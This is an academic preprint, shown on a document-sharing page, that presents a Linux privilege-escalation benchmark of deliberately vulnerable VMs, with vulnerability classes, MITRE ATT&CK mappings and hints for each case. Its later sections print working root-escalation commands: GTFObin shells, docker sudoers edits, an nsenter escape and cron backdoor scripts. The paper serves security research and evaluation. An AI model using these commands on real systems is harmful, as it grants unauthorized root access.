0% found this document useful (0 votes)
6 views6 pages

G R ? A L P - E B: OT OOT Inux RIV SC Enchmark

The document presents a benchmark for evaluating Linux privilege escalation techniques. It describes requirements for the benchmark, such as using virtual machines containing a single vulnerability. It then explains the process used to build the benchmark, which includes identifying common vulnerability classes and implementing them as individual test cases within the benchmark.

Uploaded by

fapowed807
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
6 views6 pages

G R ? A L P - E B: OT OOT Inux RIV SC Enchmark

The document presents a benchmark for evaluating Linux privilege escalation techniques. It describes requirements for the benchmark, such as using virtual machines containing a single vulnerability. It then explains the process used to build the benchmark, which includes identifying common vulnerability classes and implementing them as individual test cases within the benchmark.

Uploaded by

fapowed807
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Preprint

G OT ROOT ? A L INUX P RIV-E SC B ENCHMARK


Andreas Happe1 and Jürgen Cito1
1
TU Wien, Austria
{andreas.happe, juergen.cito}@tuwien.ac.at

A BSTRACT
arXiv:2405.02106v2 [cs.CR] 6 May 2024

Linux systems are integral to the infrastructure of modern computing environ-


ments, necessitating robust security measures to prevent unauthorized access.
Privilege escalation attacks represent a significant threat, typically allowing at-
tackers to elevate their privileges from an initial low-privilege account to the all-
powerful root account. A benchmark set of vulnerable systems is of high impor-
tance to evaluate the effectiveness of privilege-escalation techniques performed by
both humans and automated tooling. Analyzing their behavior allows defenders
to better fortify their entrusted Linux systems and thus protect their infrastructure
from potentially devastating attacks. To address this gap, we developed a com-
prehensive benchmark for Linux privilege escalation. It provides a standardized
platform to evaluate and compare the performance of human and synthetic actors,
e.g., hacking scripts or automated tooling.

1 I NTRODUCTION
Linux systems are integral to the infrastructure of modern computing environments, necessitating
robust security measures to prevent unauthorized access. Privilege escalation attacks represent a
significant threat, typically allowing attacker to elevate their privileges from an initial low-privilege
account to the all-powerful root account.
Privilege-Escalation attacks are typically performed manually by searching for exploitable config-
urations or vulnerable tools. The initial act of system reconnaissance, often named enumeration,
is often automated through usage of tools such as linpeas.sh1 . Exploitation itself is typically done
manually through the, hopefully ethical, hacker.
A benchmark set of vulnerable systems is of high importance to evaluate the effectiveness of
privilege-escalation techniques performed by both humans and automated tooling. Analyzing their
behavior allows defenders to better fortify their entrusted Linux systems and thus protect their in-
frastructure from potentially devastating attacks.

1.1 R EQUIREMENTS FOR THE B ENCHMARK

The benchmark’s use-case, i.e., testing the efficacy of malicious privilege escalation attacks against
Linux systems, leads to unique requirements:

• It should consist of Linux systems with provided low-privilege access, containing vulnera-
bilities that allow for root-level access.
• Given the sensitive use-case, i.e., attacking a system, the test-cases mandate strong security
boundaries, i.e., should be placed within virtual machines (VMs) to protect the security
of the host system. Using VMs additionally allows to include kernel-level vulnerabilities,
e.g., DirtyC0W 2 , without compromising the security of the host system.
• The test machines should be deployed within a local network. The machines itself should
be able to be run “air-gapped”, i.e., without internet connection. Running malicious tools
over public networks, e.g., against cloud instances even when owned by the user them-
selves, is prohibited in some jurisdictions.
1
https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
2
https://github.com/firefart/dirtycow

1
Preprint

Table 1: Benchmark Test-Cases


Vulnerability-Class Name Description
SUID/sudo files suid-gtfo exploiting suid binaries
SUID/sudo files sudo-all sudoers allows execution of any command
SUID/sudo files sudo-gtfo GTFO-bin in sudoers file
priv. groups/docker docker user is in docker group
information disclosure password reuse root uses the same password as lowpriv
information disclosure weak password root is using the password “root”
information disclosure password in file there’s a vacation.txt in the user’s home directory with the root password
information disclosure bash history root password is in textit.bash history
information disclosure SSH key lowpriv can use key-bases SSH without password to become root
cron-based cron file with write access is called through cron as root
cron-based cron-wildcard cron backups the backup directory using wildcards
cron-based cron/visible same as test-5 but with user-visible /var/run/cron
cron-based cron-wildcard/visible same as test-10 but with user accessible /var/spool/cron

• Each VM should contain exactly a single vulnerability or attack path.


• The created virtual machines should be as extensible and transparent as possible, mandating
both the usage and the release as open source.

2 BUILDING THE B ENCHMARK

To the best of our knowledge, there exists no benchmark for evaluating Linux priv-esc capabilities
fulfilling the stated requirements.
During pen-tester education, Capture-the-Flag Tournaments (CTFs) are often used. These are simu-
lated test-cases, often placed within Virtual Machines, in which penetration-testers typically initially
try to break in, and subsequently elevate their privileges to the root level. While these CTF machines
would fulfill many of the stated requirements, they typically contain more than a single vulnerability.
Thus, using these machines makes it difficult to assess the efficacy of automated tooling precisely
for evaluation scenarios.
Training companies such as HackTheBox or TryHackMe provide cloud-based access to a steady
stream of CTF machines. Those machines have two drawbacks: (1) the test machines are offered
through the cloud and are thus not controllable by the evaluator nor fulfilling our security require-
ments, and (2) CTF challenge machines change or degrade over time. Nobody can guarantee that a
challenge machine stays the same over time, hindering the reproducibility of results.
While being unsuited to be used directly, the CTF ecosystem provides invaluable information about
potential attack classes through training material provided by the respective companies as well as
through third-party “walkthroughs” detailing attacks against out-dated CTF machines.
To solve this, we designed a novel Linux priv-esc benchmark that can be executed locally, i.e., repro-
ducible and air-gapped. To gain detailed insights into privilege-escalation capabilities we introduce
distinct test-cases that allow reasoning about the feasibility of attackers’ capabilities for each distinct
vulnerability class.

2.1 V ULNERABILITY C LASSES

This section describes the selection process for our implemented vulnerabilities.
The benchmark consists of test cases, each of which allows the exploitation of a single specific
vulnerability class. We based the vulnerability classes upon vulnerabilities typically abused during
CTFs as well as on vulnerabilities covered by online priv-esc training platforms. Overall, we focused
on configuration vulnerabilities, not exploits for specific software versions. Recent research Happe
and Cito (2023) indicates that configuration vulnerabilities are often searched for manually while
version-based exploits are often automatically detected. This indicates that improving the former
would yield a larger real-world impact on pen-tester’s productivity.
By analyzing TryHackMe’s PrivEsc training module Tib3rius, we identified the following vulnera-
bility classes.

2
Preprint

Table 2: Mapping onto MITRE ATT&CK


Name Technique Name
vuln suid gtfo T1548.001 Setuid and Setgid
vuln sudo no password T1548.003 Sudo and Sudo Caching
vuln sudo gtfo T1548.003 Sudo and Sudo Caching
vuln docker T1543.005 Docker
cron calling user file T1053.003 Cron
root password reuse T1110.001 Password Guessing
T1078.001 Valid Account
root password root T1110.001 Password Guessing
file with root password T1552.001 Credentials in Files
T1078.001 Valid Account
vuln password in shell history T1552.003 Bash History
T1078.001 Valid Account
cron calling user wildcard T1053.003 Cron
root allows lowpriv to ssh T1552.004 Private Keys
T1078.001 Valid Account
cron calling user file cron visible T1053.003 Cron
cron calling user wildcard cron visible T1053.003 Cron

SUID and sudo-based vulnerabilities are based upon misconfiguration: the attacker is allowed to
execute binaries through sudo or access binaries with set SUID bit and through them elevate their
privileges. Pen-Testers commonly search a collection of vulnerable binaries named GTFObins (GT-
FOBins, 2024) to exploit these vulnerabilities. We do not implement advanced vulnerabilities that
would need abusing the Unix ENV, shared libraries, or bash features such as custom functions.
Cron-based vulnerabilities were implemented both with attackers being able to view root’s cron
spool directory (to analyze exploitable crontabs) as well as with inaccessible crontabs where the
attacker would have to derive that a script (named backup.cron.sh) in their home directory is utilized
by cron.
Information Disclosure-based vulnerabilities allow attackers to extract the root password from
files such as stored text-files, SSH-Keys or the shell’s history file.
After analyzing HackTheBox’s Linux Privilege Escalation documentation (Hack The Box Ltd,
2024), we opted to add a docker-based test-case which would include both Privileged Groups
as well as Docker vulnerabilities.
We did not implement all of TryHackMe’s vulnerabilities. We opted to not implement Weak File
System permissions as world-writable /etc/passwd or /etc/shadow files are not commonly encoun-
tered during this millennium anymore and similar vulnerability classes are already covered through
the information-disclosure test cases. NFS root squashing attacks require the attacker to have root
access to a dedicated attacker box which was deemed out-of-scope for the initial benchmark. Ker-
nel Exploits are already well covered by existing tooling, e.g., linux-exploit-suggester2 Donas. In
addition, kernel-level exploits are often unstable and introduce system instabilities and thus not
well-suited for a benchmark. We opted not to implement Service Exploits as this vulnerability was
product-specific (mysql db).
The resulting vulnerability test-cases are detailed in Table 1. We discussed this selection with two
professional penetration-testers who thought it to be representative of typical CTF challenges. The
overall architecture of our benchmark allows the easy addition of further test-cases in the future.

2.2 M APPING ONTO MITRE ATT&CK

MITRE ATT&CK is “is a knowledge base of cyber adversary behavior and taxonomy for adver-
sarial actions across their lifecycle”3, originally focusing Microsoft Windows Enterprise networks.
Subsequent iterations also include Linux attack vectors.
3
https://attack.mitre.org/resources/faq/#other-models-faq

3
Preprint

Table 3: Provided Hints for each Test-Case


Name Provided Hint
vuln suid gtfo there might be some exploitable suid binary on the system.
vuln sudo no password there might be a sudo misconfiguration.
vuln sudo gtfo there might be some bad sudo binaries on the system.
vuln docker lowpriv is allowed to use docker.
ron calling user file /home/lowpriv/cron.sh is periodically called through cron as root.
root password reuse root might be reusing a password.
root password root root might be useing an insecure password.
file with root password the root password might be stored somewhere in the filesystem.
vuln password in shell history the root password might be in the bash history.
cron calling user wildcard home/lowpriv/backup is periodically backuped with tar through a cronjob as root.
root allows lowpriv to ssh there might be a reused ssh key lying around in the home directory.
cron calling user file cron visible there’s a cronjob running a script as root in the system.
cron calling user wildcard cron visible there’s a cronjob running a script as root in the system.

Our benchmark consists of common attack paths, according to CTF documentation. In contrast,
MITRE ATT&CK is an unordered taxonomy of potential attack vectors. In Table 2, benchmark
cases are mapped upon their corresponding MITRE techniques.

2.3 A DDING H INTS FOR P RIMING

Recent research indicates that human hackers rely on intuition or checklists when searching for vul-
nerabilities Happe and Cito (2023). The mentioned checklists often consist of different vulnerability
classes to test.
To allow emulation of this manual process, we introduce optional hints to each test case in our
benchmark that emulate going through a vulnerability class checklist, e.g., the hint for sudo binaries
is “there might be a sudo misconfiguration”. The hints are about the vulnerability class, not about a
concrete vulnerability. Iterating through multiple hints would thus emulate a human going through
a checklist of vulnerability classes. Currently implemented hints are provided in Table 3.

2.4 B ENCHMARK I MPLEMENTATION

To allow for extensibility the benchmark was implemented using well-known Unix administration
tools. The virtual machines are provisioned using the Vagrant and are based on standard Debian
GNU/Linux distributions. Vulnerabilities are introduced into each VM using Ansible automation
scripts. Ansible is also used to prepare a low-privilege account (“lowpriv”) and high-level account
(“root”) with a standard password.

3 I NSIGHTS INTO THE B ENCHMARK

After describing the selection process and composition of the benchmark, we elaborate further upon
the benchmark itself and incorporate feedback from professional penetration testers.

3.1 E NUMERATION VS . E XPLOITATION

During the enumeration phase of an attack, system information is gathered and used to identify
potential vulnerable configurations and components that are subsequently targeted through attacks.
Penetration testers commonly stress the importance of system enumeration for successful penetra-
tion testing.
Anecdotally speaking, the time effort to enumerate a system and subsequently identify a potential
attack vector far supersedes the time effort for exploitation.
Automation in Linux privilege-escalation scenarios is focused on making system enumeration more
efficient. Tools such as linpeas.sh automate the often tedious tasks of gathering system information.
Analysis of the gathered information as well as its exploitation is typically performed manually.

4
Preprint

Table 4: Example exploitation commands.

Name Potential exploit


vuln suid gtfo python3.11 -c ’import os; os.execl(”/bin/shp”, ”sh” ”-p”)’
find / -exec /bin/sh -p
vuln sudo no password sudo -i
vuln sudo gtfo sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/sh
root password reuse test credentials root:trustno1
root password root test credentials root:root
file with root password cat /home/lowpriv/vacation.txt; test credentials root password
vuln password in shell history cat /home/lowpriv/.bash history; test credentials root password
root allows lowpriv to ssh ssh -o StrictHostKeyChecking=no root@localhost

This is a difference to the Windows-Ecosystem where attack tooling oftentimes combines enumer-
ation and exploitation, e.g., tools such as PowerUp.ps1 or SharpUp allow to both detect as well as
exploit misconfiguration.

3.2 S INGLE - VS . M ULTI -S TEP E XPLOITATION

When analysing the potential exploitation of the vulnerabilities contained within the benchmark,
two distinct classes arise.
The first class consists of Single-Step Exploits, i.e., vulnerabilities that can be exploited by giving
a single command after successful identification in the enumeration phase. Example vulnerabilities
and their respective exploitation are shown in Table 4.
In contrast, Multi-Step Exploits warrant the execution of multiple steps. Each step depends on the
successful execution of all prior steps. One example of such a vulnerability would be the vuln docker
test-case in which the low-priv user is allowed to execute high-privileged Docker containers. In such
a scenario, the attacker would initially start a new container that mounts the host filesystem with
write access and subsequently modify the host filesystem to give the use elevated access rights. We
show an example of such an exploit in the following.

# mount and switch to host filesystem within the


# container at /host
$ docker run -it -v /:/host alpine chroot /host bash

# add the lowpriv user to the host /etc/suderos file


# (which allows lowpriv to execute commands on the host
# as root
$ echo "lowpriv ALL=(ALL:ALL) ALL" >> /host/etc/sudoers

# exit the container


$ exit

# execute command as root


$ sudo bash

Please note, that the same scenario could be executed using a single-step exploitation when abusing
missing namespace separations:

# escape the namespace by using the host process


# namespace, esp. by switching into the namespace
# of process 1 (init) which always runs as root on
# a linux system.
$ docker run -it --privileged --ns=host alpine nsenter
--target 1 --mount
--uts --ipcs --net --pid -- bash

5
Preprint

The benchmark suite also includes multiple scenarios utilizing timed tasks, i.e., cron tasks, in Linux
systems. While the prior multi-step exploitation examples had a causal ordering, cron-based exploits
also include a temporal component: in an initial step, the attacker places malicious code that will
subsequently be called by the cron process with elevated privileges. When this malicious code is
executed, it changes the system configuration and creates a backdoor that allows the attacker to
elevate their privileges. The attacker typically has to periodically check if the malicious code has
already been executed and try to elevate their privileges. Oftentimes, the attacker does not know
when or if the malicious code is executed, but has to use educated guesses about potential execution
times, e.g., that a backup script will typically be called outside of typical office hours.
The scenario cron calling user file or cron calling user file cron visible could be abused by the
following commands:
# place code that adds a new suid binary to the system
# when called through cron
echo ’#!/bin/bash\ncp /usr/bin/bash \\
/home/bash\nchmod +s /home/bash"’ \\
> /home/lowpriv/backup.cron.sh

# alternative: resetting the root password when called through cron


echo ’#!/bin/bash\necho "trustno1" | passwd’ > \\
/home/lowpriv/backup.cron.sh
In those examples, the attacker has to wait until the cron job is executed, typically this ranges from
minutes in CTFs to hours in real-life systems. Only after the cron command has been executed,
the backdoor is inserted into the system, and the attacker can subsequently abuse that backdoor to
elevate their privileges.

4 C ONCLUSION
We curated a new Linux privilege escalation benchmark and elaborated on the decisions that led to
its creation. We further detail particularities about the enumeration and exploitation of Linux-based
systems that are mirrored within our benchmark.
As the benchmark is released as open-source on GitHub, and through the usage of standard Linux
system administration tools, we enable third-parties to easily extend the benchmark with additional
attack classes or more scenarios for our initially identified attack classes.

DATA AVAILABILITY
The benchmark suite has been published at github.com/ipa-lab/benchmark-privesc
-linux.

R EFERENCES
Jonathan Donas. Linux exploit suggester 2. https://github.com/jondonas/linux-e
xploit-suggester-2. Accessed: 2024-03-11.
GTFOBins. Gtfobins. https://gtfobins.github.io/, 2024. Accessed: 2024-03-11.
Hack The Box Ltd. Hackthebox academy: Linux privilege escalation. https://academy.
hackthebox.com/course/preview/linux-privilege-escalation, 2024.
Accessed: 2024-03-11.
Andreas Happe and Jürgen Cito. Understanding hackers’ work: An empirical study of offensive
security practitioners. In Proceedings of the 31st ACM Joint European Software Engineering
Conference and Symposium on the Foundations of Software Engineering, ESEC/FSE 2023, New
York, NY, USA, 2023. Association for Computing Machinery.
Tib3rius. Tryhackme: Linux privesc. https://tryhackme.com/room/linuxprivesc.
Accessed: 2024-03-11.

You might also like